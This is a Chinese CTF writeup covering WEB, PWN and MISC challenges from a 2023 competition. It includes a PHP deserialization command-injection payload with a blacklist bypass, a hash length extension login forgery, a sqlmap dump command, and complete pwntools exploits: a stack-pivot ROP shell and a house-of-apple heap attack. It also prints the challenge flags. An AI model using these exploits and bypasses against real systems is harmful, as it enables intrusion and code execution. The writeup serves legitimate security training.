WEB
eaaeval
访问链接，页面源码中提示存在备份文件；目录泄露了 `www.zip`，下载解压后得到站点源码：
<?php
class Flag{
// Intentionally vulnerable gadget class: the destructor concatenates two
// attacker-controlled properties into a shell command and runs it.
public $a;
public $b;
public function __construct(){
$this->a = 'admin';
$this->b = 'admin';
}
public function __destruct(){
// Blacklist only (case-insensitive): flag|system|php|cat|tac|shell|sort.
// It matches literal substrings, so shell-level tricks that never spell a
// blocked word -- quote splitting (t''ac) or globbing (/f*) -- pass through
// untouched and reach system() below.
if(!preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->a) && !preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->b)){
// Command-injection sink: $a and $b are joined with a space and executed.
system($this->a.' '.$this->b);
}else{
echo "again?";
}
}
}
// Deserialization sink: the raw GET parameter goes straight to unserialize(),
// so any serializable class with a magic method (here Flag::__destruct) is a
// usable gadget; the destructor fires as soon as the result is discarded.
$wzbz = $_GET['wzbz'];
unserialize($wzbz);
?>
Flag::__destruct 只用正则黑名单检查 `$a`、`$b`，然后把两者用空格拼接交给 system()。黑名单只匹配字面子串，因此用 shell 引号拆词 `t''ac` 绕过 `tac`、用通配 `/f*` 代替 `/flag`、再用 `;` 截断命令，使 `$b`（`whoami`）成为独立的无害命令。编写如下 exp 生成反序列化载荷，对象在 unserialize() 后析构时执行命令，直接获取 flag：
<?php
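class Flag{
    // Mirror of the target's Flag class; only the serialized property values
    // matter, so no __destruct is needed on the attacker side.
    public $a;
    public $b;
    public function __construct(){
        // Resulting command: t''ac /f*; whoami
        //  - t''ac : the empty quotes split the word, so /tac/ never matches
        //  - /f*   : the glob expands to /flag without spelling "flag"
        //  - ;     : ends the command, making $b a harmless second command
        // Double quotes are required here: PHP does not join adjacent string
        // literals, so 't''ac /f*;' is a parse error rather than the intended
        // 10-byte string (see s:10:"t''ac /f*;" in the serialized output).
        $this->a = "t''ac /f*;";
        $this->b = 'whoami';
    }
}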
// Build the gadget and print it URL-encoded, ready to paste into ?wzbz=
$a = new Flag();
$serialized = serialize($a);
echo urlencode($serialized);
exp 输出如下，作为 GET 参数 `wzbz` 传入即可获取 flag：
O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A10%3A%22t%27%27ac+%2Ff%2A%3B%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22whoami%22%3B%7D
upload_shell
hashpump 伪造（哈希长度扩展攻击）：登录时的 `source` Cookie 是一个 32 位十六进制摘要，推测为 MD5(secret || password)。用 hashpump 对已知摘要和明文 `password` 追加数据（这里追加 `abc`），得到新摘要和带填充的明文：填充为 `\x80`、若干 `\x00` 和 8 字节小端位长度（下面请求里是 `\xd8` = 216 bit = 27 字节，即 19 字节密钥 + 8 字节 `password`，密钥长度需要枚举）。
upload->sql注入
把 hashpump 生成的新摘要填入 `source` Cookie，带填充的明文作为 password 提交，请求如下：
POST /login.php HTTP/1.1
Host: 80.endpoint-01267626a6c345c9a82480694ffffcbb.m.ins.cloud.dasctf.com:81
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://80.endpoint-01267626a6c345c9a82480694ffffcbb.m.ins.cloud.dasctf.com:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://80.endpoint-01267626a6c345c9a82480694ffffcbb.m.ins.cloud.dasctf.com:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=1a0230c0647489bb0b5610b287d4f3e2; source=a1f278b3d6fef96d7b8805b5e17351ee
Connection: close
username=admin&password=password%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D8%00%00%00%00%00%00%00abc
访问来到 upload.php
把访问 upload.php 的请求保存为 sql.txt，直接交给 sqlmap（`-r` 读取请求文件）跑注入：
获取flag
python3 sqlmap.py -r sql.txt -D test -T flag -C flag --dump
PWN
ez_base
代码审计
程序整体功能是对输入字符串做 base64 编码，或把 base64 解码回字符串。
漏洞在于解码时不检查解码后的长度是否超过栈上缓冲区（0x20 字节），直接写入，解码完成后造成栈溢出。
思路
溢出只能覆盖到 saved rbp 和返回地址，空间有限，因此用栈迁移解决：
先把 rbp 控制为 bss 上的地址，并返回到读入/解码的位置重新执行，让下一次输入落在 bss 附近；然后用 ROP 调用 read 往 bss 上写入第三段载荷，最后构造 execve("/bin/sh",0,0) 拿 shell。
from pwn import*
import base64
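# The target is x86-64 (p64 ROP chain, pop rdi/rsi/rdx gadgets, execve = 0x3b
# below), so the context must be amd64; 'i386' was inconsistent and misleads
# any pwntools helper that consults context.arch/bits.
context(arch='amd64', os='linux', log_level="debug")
# Terminal used by gdb.attach() under WSL; adjust for your own environment.
context.terminal = ["wt.exe", "wsl.exe"]
# libc = ELF("../libc/")
# libc = ELF("./libc-so.6")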
def get_p(name):
    """Connect to the remote challenge and load the local binary.

    Sets the module-level ``p`` (tube) and ``elf`` (ELF) used by the rest of
    the script. The commented-out process() line is the local-debug variant.
    """
    global p, elf
    # p = process(name)
    host, port = "tcp.cloud.dasctf.com", 24889
    p = remote(host, port)
    elf = ELF(name)
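get_p("./base")

# Gadgets and addresses inside the challenge binary (0x4xxxxx, i.e. static
# addresses without PIE); re-derive with ROPgadget if the binary changes.
pop_rdi   = 0x0000000000402bfe
pop_rsi   = 0x00000000004070ff
pop_rdx   = 0x0000000000456be2
pop_rax   = 0x000000000041e08a
syscall   = 0x00000000004e30d6
leave_ret = 0x0000000000404633
# Writable scratch area in .bss that becomes the pivoted stack.
bss = 0x005C7610 + 0x100

# Stage 1: the decoder does not check the decoded length, so 0x20 bytes fill
# the stack buffer, the next qword replaces saved rbp with the .bss address
# and the return address goes back into the read/decode routine (0x404AED),
# so the next input is stored relative to the new rbp.
payload = b"A" * 0x20 + p64(bss) + p64(0x0000404AED)
p.sendlineafter(b"2:decode", b"2")
p.sendlineafter(b"cin en_str:", base64.b64encode(payload))

# Stage 2: lands at bss-0x20. On the function's return the chain runs
#   pop rsi (bss-8); pop rdx (0x200); leave; ret   -> rsp = bss-0x20
#   pop rdi (0); syscall                           -> read(0, bss-8, 0x200)
# It relies on rax still being 0 (SYS_read) at the syscall -- verify in gdb
# if the shell does not come back.
payload = (
    p64(pop_rdi) + p64(0) + p64(syscall) + p64(0)
    + p64(bss - 0x28)              # saved rbp consumed by leave_ret
    + p64(pop_rsi) + p64(bss - 8)  # return address: start of the read setup
    + p64(pop_rdx) + p64(0x200)
    + p64(leave_ret)
)
p.sendlineafter(b"cin en_str:", base64.b64encode(payload))
# gdb.attach(p, "b *0x0404B5D")

# Stage 3: raw bytes read by the read() above, starting at bss-8. After the
# syscall returns, rsp == bss-8, so execution continues into this chain:
# execve("/bin/sh", 0, 0) with the path stored at bss+0x40. The path must be
# NUL-terminated: the original had the literal text "x00" (lost backslash),
# which makes execve look for a file called "/bin/shx00".
sleep(2)  # give the target time to reach the read() before sending
payload = (
    p64(pop_rax) + p64(0x3b)
    + p64(pop_rdi) + p64(bss + 0x40)
    + p64(pop_rsi) + p64(0)
    + p64(pop_rdx) + p64(0)
    + p64(syscall)
    + b"/bin/sh\x00"
)
p.send(payload)
p.interactive()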
bad apple
沙盒
代码审计
标准的菜单
漏洞在这UAF
只能泄露一次
思路
只有一次泄露机会，因此要一次同时拿到 heap 和 libc 地址：构造两个大小不同但落在同一 large bin 的 large chunk，show 其中一个即可同时读到指向 main_arena 的 fd 和指向另一堆块的 nextsize 指针。之后是常规的 house of apple 利用：第一次 large bin attack 把 libc 中的 stderr 指针改成堆上伪造的 _IO_FILE；第二次 large bin attack 把 top chunk 的 size 改坏，下一次分配触发的错误输出会走 stderr 的 IO 链，最终经 setcontext 栈迁移到堆上布置好的 orw ROP。注意：exp 里的 libc / 堆偏移都针对题目给出的 libc-so.6，换环境需要重新计算。
exp
from importlib.resources import contents
from pwn import*
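# x86-64 target (64-bit libc offsets and p64 chains below); the original
# said i386, which is wrong for any pwntools helper that consults context.arch.
context(arch='amd64', os='linux', log_level="debug")
context.terminal = ["wt.exe", "wsl.exe"]  # gdb.attach() terminal under WSL
# libc = ELF("../libc/")
# The libc shipped with the challenge: every hard-coded offset in this
# script (bin headers, gadgets, _IO_wfile_jumps) is specific to this build.
libc = ELF("./libc-so.6")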
def get_p(name):
    """Open the remote tube and load the challenge ELF.

    Assigns the globals ``p`` (connection) and ``elf``. The commented-out
    process() call is the local variant that runs the binary under the
    bundled loader and libc.
    """
    global p, elf
    # p = process(["./ld-linux-x86-64.so.2", "./pwn"],
    #             env={"LD_PRELOAD": "./libc.so.6 "})
    host, port = "tcp.cloud.dasctf.com", 28232
    p = remote(host, port)
    elf = ELF(name)
def add(choice, content="AAA"):
    """Menu 1: allocate an apple of ``choice`` bytes and write ``content`` into it."""
    p.sendlineafter("Choice: ", b'1')
    size_str = str(choice)
    p.sendlineafter("Apple size: ", size_str)
    p.sendafter("Updata a sign to your apple: ", content)
def dele(num):
    """Menu 4: free apple ``num`` (the pointer is not cleared -> UAF)."""
    p.sendlineafter("Choice: ", b'4')
    index_str = str(num)
    p.sendlineafter("Which one: ", index_str)
def edit(num, data):
    """Menu 2: overwrite the contents of apple ``num`` with ``data``."""
    p.sendlineafter("Choice: ", b'2')
    index_str = str(num)
    p.sendlineafter("Which one: ", index_str)
    p.sendafter("Content: ", data)
def show(num):
    """Menu 3: print the contents of apple ``num`` (the one allowed leak)."""
    p.sendlineafter("Choice: ", b'3')
    index_str = str(num)
    p.sendlineafter("Which one: ", index_str)
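get_p("./pwn")

# --- Leak ------------------------------------------------------------------
# Two large chunks of different sizes end up in the same large bin, so the
# dangling pointer to chunk 0 shows both a main_arena pointer (fd) and a heap
# pointer (bk / nextsize links). Chunk offsets: 0 @0x290, 3 @0xf50.
add(0x438, b'colin')  # 0
add(0x440, b'colin')  # 1
add(0x428, b'colin')  # 2
add(0x440, b'colin')  # 3
dele(0)
add(0x440, b'colin')  # 4  (larger than chunk 0: chunk 0 is sorted into the large bin)
dele(3)
add(0x450, "AAA")     # 5  (same for chunk 3)
show(0)
# The original read until the literal text "x7f" and padded with the 3-byte
# string "x00" (which ljust rejects); both were lost backslashes.
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x21a0e0
p.recv(2)
heap_base = u64(p.recv(8)) - 0xf50  # next qword points at chunk 3 (heap_base+0xf50)
print(hex(libc.address))
print(hex(heap_base))

# --- libc symbols and gadgets (offsets for the provided libc-so.6) ---------
stderr = libc.symbols['stderr']   # the `stderr` FILE* variable in libc's data
setcontext = libc.sym['setcontext']
close = libc.sym['close']
read = libc.sym['read']
puts = libc.sym['puts']
pop_rdi     = libc.address + 0x000000000002a3e5  # pop rdi ; ret
pop_rsi     = libc.address + 0x000000000002be51  # pop rsi ; ret
pop_rdx_r12 = libc.address + 0x000000000011f497  # pop rdx ; pop r12 ; ret
pop_rax     = libc.address + 0x0000000000045eb0  # pop rax ; ret
ret         = libc.address + 0x0000000000029cd6  # ret
syscall_ret = libc.address + 0x0000000000091396  # syscall ; ret
_IO_wfile_jumps = libc.address + 0x2160c0
# (tcbhead_t, _IO_cookie_jumps and gadget from the original were unused.)

fake_io_addr = heap_base + 0x290   # header of chunk 0/6: becomes the fake stderr FILE
rop_addr     = heap_base + 0x20d0  # user data of chunk 8 (carved from top after 4,5,7)
flag_addr    = rop_addr + 0x98     # == heap_base + 0x2168: "/flag\0" right after the 0x98-byte chain

# --- Fake stderr FILE --------------------------------------------------------
# The payload is written to chunk 6's user data (fake_io_addr + 0x10), so the
# chunk's prev_size/size fields play _flags/_IO_read_ptr and the buffer below
# starts at _IO_read_end. Key relationships (all offsets relative to
# fake_io_addr):
#   vtable     = _IO_wfile_jumps + 0x10, so a write through stderr resolves the
#                xsputn slot to a different _IO_wfile_* entry (presumably
#                _IO_wfile_seekoff), which ends up calling through _wide_data
#   _wide_data = +0x30, i.e. this same buffer; its _wide_vtable (+0xe0 from
#                there = +0x110) is set to +0x40, so [rax+0x18] is the
#                setcontext+61 value stored in _IO_save_end (+0x58)
#   rdx        = _IO_backup_base = +0xb0; setcontext+61 loads rsp from
#                rdx+0xa0 (+0x150 -> rop_addr) and rip from rdx+0xa8 (-> ret)
# Wide vtables are not validated by glibc, which is why this works. Offsets are
# glibc-2.35-era; verify them against the shipped libc before reuse.
fake_struct  = p64(0)                       # _IO_read_end
fake_struct += p64(0)                       # _IO_read_base
fake_struct += p64(0)                       # _IO_write_base
fake_struct += p64(0)                       # _IO_write_ptr
fake_struct += p64(0)                       # _IO_write_end
fake_struct += p64(0)                       # _IO_buf_base
fake_struct += p64(1)                       # _IO_buf_end
fake_struct += p64(0)                       # _IO_save_base
fake_struct += p64(fake_io_addr + 0xb0)     # _IO_backup_base -> rdx (ucontext for setcontext+61)
fake_struct += p64(setcontext + 61)         # _IO_save_end -> the function pointer that gets called
fake_struct += p64(0)                       # _markers
fake_struct += p64(0)                       # _chain
fake_struct += p64(0)                       # _fileno
fake_struct += p64(0)                       # _old_offset
fake_struct += p64(0)                       # _cur_column
fake_struct += p64(heap_base + 0x200)       # _lock: any writable address
fake_struct += p64(0)                       # _offset
fake_struct += p64(0)                       # _codecvt
fake_struct += p64(fake_io_addr + 0x30)     # _wide_data -> overlaps this struct
fake_struct += p64(0)                       # _freeres_list
fake_struct += p64(0)                       # _freeres_buf
fake_struct += p64(0)                       # __pad5
fake_struct += p32(0)                       # _mode
fake_struct += b"\x00" * 20                 # _unused2: exactly 20 bytes ("x00"*20 would be 60 and shift every later field)
fake_struct += p64(_IO_wfile_jumps + 0x10)  # vtable
fake_struct += p64(0) * 6                   # padding up to _wide_data->_wide_vtable
fake_struct += p64(fake_io_addr + 0x40)     # _wide_vtable: makes [rax+0x18] == setcontext+61
print(hex(len(fake_struct)))                # expect 0x108
# Seven zero qwords, then the ucontext tail: rdx+0xa0 = rsp, rdx+0xa8 = rip.
payload = fake_struct + p64(0) * 7 + p64(rop_addr) + p64(ret)
add(0x438, payload)  # 6  (exact fit: reuses chunk 0 at fake_io_addr)

# --- Large-bin attack #1: libc `stderr` -> fake FILE -------------------------
dele(0)  # chunk 0 (== chunk 6) back into the unsorted bin
# Chunk 3 is the only entry in the large bin; point its bk_nextsize at
# stderr-0x20 so sorting chunk 0 writes chunk 0's address into `stderr`.
edit(3, p64(libc.address + 0x21a0e0) * 2 + p64(heap_base + 0x290) + p64(stderr - 0x20))
add(0x460, "AAAAA")  # 7  (sorts chunk 0 -> performs the write; chunk 7 comes from top)

# --- ORW ROP chain, placed in chunk 8 (rop_addr) -----------------------------
rop  = p64(pop_rdi) + p64(0) + p64(close)                                              # close(0)
rop += p64(pop_rdi) + p64(flag_addr) + p64(pop_rax) + p64(2) + p64(syscall_ret)        # open("/flag") -> fd 0 (rsi assumed 0 / O_RDONLY)
rop += (p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(flag_addr + 0x10)
        + p64(pop_rdx_r12) + p64(0x100) + p64(0) + p64(read))                          # read(0, flag_addr+0x10, 0x100)
rop += p64(pop_rdi) + p64(flag_addr + 0x10) + p64(puts)                                # puts(flag_addr+0x10)
add(0x470, rop + b"/flag\x00")  # 8  (path must be NUL-terminated, not the literal "x00")

# --- Large-bin attack #2: shrink the top chunk and trigger the IO chain -------
add(0x480, b"flag")   # 9
add(0x480, b"77777")  # 10
add(0x470, b"77777")  # 11
dele(9)
add(0x4a0, b"77777")  # 12  (sorts chunk 9 into the large bin; top is now at heap_base+0x3790)
dele(11)              # unsorted; will be sorted by the next request
# bk_nextsize = (top size field + 3) - 0x20, so the insertion writes chunk 11's
# address at top+0xb: the pointer's high bytes land on the low bytes of the
# size, leaving a tiny top chunk.
edit(9, p64(libc.address + 0x21a0f0) * 2 + p64(heap_base + 0x2540) + p64(heap_base + 0x3790 - 0x20 + 3))
# The 0x4a0 request cannot be served from the shrunken top, so malloc falls
# into sysmalloc and (presumably) fails its top-chunk assertion; the error
# text is written to stderr, now our fake FILE, which pivots into the chain.
p.sendlineafter(b"Choice: ", b'1')
# gdb.attach(p, "b *&_IO_wfile_overflow")
# sleep(2)
p.sendlineafter(b"Apple size: ", str(0x4a0).encode())
p.interactive()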
MISC
ez_zip
直接用脚本循环解压
import zipfile
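def extract_chain(name):
    """Unzip ``name + '.zip'`` and keep following the nested archives.

    After each extraction the next archive name is taken from the first
    member's filename (the part before the first '.'), as in the original
    loop. Stops at the first error -- normally when the innermost member is
    not an archive and ``name + '.zip'`` does not exist -- prints it, and
    returns the last name reached (the innermost file's base name).

    Note: ZipFile.extractall() strips absolute paths and ".." components,
    but a hostile archive can still be a zip bomb; only run this on CTF data.
    """
    while True:
        try:
            # The original never closed the archive; the context manager does.
            with zipfile.ZipFile(name + '.zip', 'r') as archive:
                archive.extractall()
                name = archive.filelist[0].filename.split('.')[0]
        except Exception as e:  # broad on purpose: any failure ends the chain
            print("发生错误:", e)
            return name


name = extract_chain('ez_zip')  # initial archive name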
得到1.txt
+-+++-++ +-+++++- +-+-++-- +-++++-- +-+-+-++ +-+++--+ +----+-- ++--+++- ++--++++ +--+++-- ++--+-+- ++---+++ ++--++-+ ++--+-+- ++---+++ +--+++-- +--+++-- +--++--+ ++--+++- +--++-+- ++--+--- +--+++-- ++--+--+ ++--++-- ++--+++- +--++-+- ++--+-+- ++---++- ++--+++- ++--+++- +--++-+- +--++-++ ++--+--+ +--++++- +--+++-- +--+++-- ++--+-++ +--++-+- +--++-++ +-----+-
先把 `+` 替换成 `.`（`-` 保持不变），得到摩尔斯电码：
.-...-.. .-.....- .-.-..-- .-....-- .-.-.-.. .-...--. .----.-- ..--...- ..--.... .--...-- ..--.-.- ..---... ..--..-. ..--.-.- ..---... .--...-- .--...-- .--..--. ..--...- .--..-.- ..--.--- .--...-- ..--.--. ..--..-- ..--...- .--..-.- ..--.-.- ..---..- ..--...- ..--...- .--..-.- .--..-.. ..--.--. .--....- .--...-- .--...-- ..--.-.. .--..-.- .--..-.. .-----.-
使用 https://www.lddgo.net/encrypt/morse 解摩尔斯电码，得到一串 `%uXXXX` 形式的 Unicode 转义：
%u44%u41%u53%u43%u54%u46%u7b%u31%u30%u63%u35%u38%u32%u35%u38%u63%u63%u66%u31%u65%u37%u63%u36%u33%u31%u65%u35%u39%u31%u31%u65%u64%u36%u61%u63%u63%u34%u65%u64%u7d
取每个 `%u` 后面的两位十六进制数拼接，得到十六进制串，再做 hex 解码即为 flag：
4441534354467b31306335383235386363663165376336333165353931316564366163633465647d
# DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}
gb2312-80
题目附件中有 cipher.txt，内容是一组整数列表，每 16 个整数对应一个 16×16 的点阵字模（题名 gb2312-80 和后面的密码 HZK16 都指向汉字库点阵格式：每个整数是一行，按位表示像素）。
直接写脚本把点阵按位打印出来：
# One entry per glyph: 16 row words of a 16x16 bitmap, bit 15 = leftmost
# column. The full listing from cipher.txt is elided in the writeup.
lt = [
[0,0,4080,3072,3072,3072,4032,3680,48,48,48,3120,1632,960,0,0],
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0],
[0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0],
...
... # elided: too long
...
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0],
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0],
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0]
]
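def render_glyph_rows(glyphs):
    """Render 16x16 dot-matrix glyphs as text.

    Each glyph is a list of (up to) 16 row words, bit 15 being the leftmost
    column. Set bits print as ``'0 '``, clear bits as ``'. '``, one row per
    line, with a blank line between glyphs. Returns the rendering as a string.
    """
    out = []
    for rows in glyphs:
        for word in rows[:16]:
            # Same masking as the original so oversized/negative values don't
            # break bin(); zfill keeps at least 16 columns.
            bits = format(word & 0xffffffff, 'b').zfill(16)
            out.append(''.join('0 ' if b == '1' else '. ' for b in bits))
            out.append('\n')
        out.append('\n')
    return ''.join(out)


with open('final.txt', 'w+', encoding='utf-8') as fp:
    # The original wrote the literal letter 'n' instead of '\n' (lost
    # backslash), producing one run-on line; real newlines restore the grid.
    fp.write(render_glyph_rows(lt))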
渲染出来的点阵是可读的数字，手工抄录后转成文件，
得到一个 zip，里面有 hint.txt
和 flag.txt。
通过hint.txt
得到密码
# hint.txt: 13 bit-strings, each 16 rows x 16 columns ('1' = set pixel);
# rendered below they read as the password characters.
x = [ '0000100000010000111111111111100000010000000100000001000100010000001000010001000000100101000100000011111100010000011001010001010010100101111111100010010000000100001001000010010000100111111101000010010000000100001111000000010000100100000101000000000000001000',
'0000111111100000000010000010000000001000001000000000111111100000000010000010000000001000001000000000111111100000000000000000010011111111111111100000000100000000000010010010000000001001111100000000100100000000000101010000000000100011000001100100000011111100',
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000011110000000000001111000000000000011000000000000000000000000000000110000000000000111100000000000011110000000000000110000000000000000000000000',
'0000000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000',
'0000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000',
'0000000000000000000000000000000000000011111000000000011000110000000011000001100000011000000011000001100000001100000110000000110000011000000011000001100000001100000110000000110000001100000110000000011000110000000000111110000000000000000000000000000000000000',
'0000000000000000000000000000000000111100000111000001100000001000000110000000100000011000000100000000110000010000000011000010000000001100001000000000011001000000000001100100000000000010100000000000001110000000000000010000000000000000000000000000000000000000',
'0000000000000000000000000000000000011111111110000000110000011000000011000000100000001100000000000000110000100000000011111110000000001100001000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000',
'0000000000000000000000000000000000011110001111000000110000011000000011000001100000001100000110000000110000011000000011111111100000001100000110000000110000011000000011000001100000001100000110000000110000011000000111100011110000000000000000000000000000000000',
'0000000000000000000000000000000000111111111110000010000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000010000011000000011000001111111111100000000000000000000000000000000000',
'0000000000000000000000000000000000011110011111000000110000110000000011000110000000001100110000000000110110000000000011111000000000001101110000000000110011100000000011000111000000001100001110000000110000011100000111100001111000000000000000000000000000000000',
'0000000000000000000000000000000000000000100000000000001110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000',
'0000000000000000000000000000000000000011110000000000011001100000000011000011000000001100000000000000110111000000000011100110000000001100001100000000110000110000000011000011000000001100001100000000011001100000000000111100000000000000000000000000000000000000'
]
# Print every bit-string as 16-column rows: '0' becomes '. ' (blank pixel),
# '1' is left as-is, so each glyph is readable in the terminal; a blank line
# separates glyphs.
for bitmap in x:
    width = 16
    row_count = len(bitmap) // width
    for row in range(row_count):
        start = row * width
        print(bitmap[start:start + width].replace('0', '. '))
    print()
得到密码:ILOVEHZK16
解压flag.txt
DASCTF{842a99305a07e6183830582d1740c1b1}
原文始发于微信公众号(ACT Team):2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛Writeup